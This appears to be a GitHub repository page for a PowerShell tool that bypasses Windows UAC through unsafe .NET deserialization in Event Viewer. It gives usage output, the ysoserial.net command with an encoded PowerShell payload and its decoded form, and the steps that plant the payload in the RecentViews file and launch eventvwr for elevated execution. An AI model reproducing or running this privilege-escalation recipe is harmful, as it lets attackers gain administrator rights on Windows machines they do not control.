Skip to content

CsEnox/EventViewer-UACBypass

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

11 Commits
Β 
Β 
Β 
Β 

Repository files navigation

EventViewer-UACBypass

  • RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass.
  • Full credits to Orange Tsai

Usage

PS C:\Windows\Tasks> Import-Module .\Invoke-EventViewer.ps1

PS C:\Windows\Tasks> Invoke-EventViewer 
[-] Usage: Invoke-EventViewer commandhere
Example: Invoke-EventViewer cmd.exe

PS C:\Windows\Tasks> Invoke-EventViewer cmd.exe
[+] Running
[1] Crafting Payload
[2] Writing Payload
[+] EventViewer Folder exists
[3] Finally, invoking eventvwr

Working

i) First, the script adds commands to be run to the file C:\Windows\Tasks\EventViewerRCE.ps1

  • Stop-Process -name mmc* : Is used to close Microsoft Management Console.
  • After that the command to be executed is added.

ii) Then it crafts payload which runs C:\Windows\Tasks\EventViewerRCE.ps1 script. The base64 payload was generated using ysoserial.net :

ysoserial.exe -o base64 -f BinaryFormatter -g DataSet -c "powershell.exe -nop -e UwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAOwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXABFAHYAZQBuAHQAVgBpAGUAdwBlAHIAUgBDAEUALgBwAHMAMQA="
  • The base64 output from ysoserial.net is decoded and stored in C:\Windows\Tasks\p4yl0ad
  • The powershell encoded command decodes to :
Set-ExecutionPolicy Bypass -Scope CurrentUser; C:\Windows\Tasks\EventViewerRCE.ps1

iii) When WriteFile function is executed, it checks if the Event Viewer folder exists in AppData and it it doesn't then we create the folder. Finally storing our base64 decoded payload in RecentViews file under this folder.

iv) In the end, eventvwr is executed which then executes our payload.


Reference

About

🍊 Orange Tsai EventViewer RCE

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published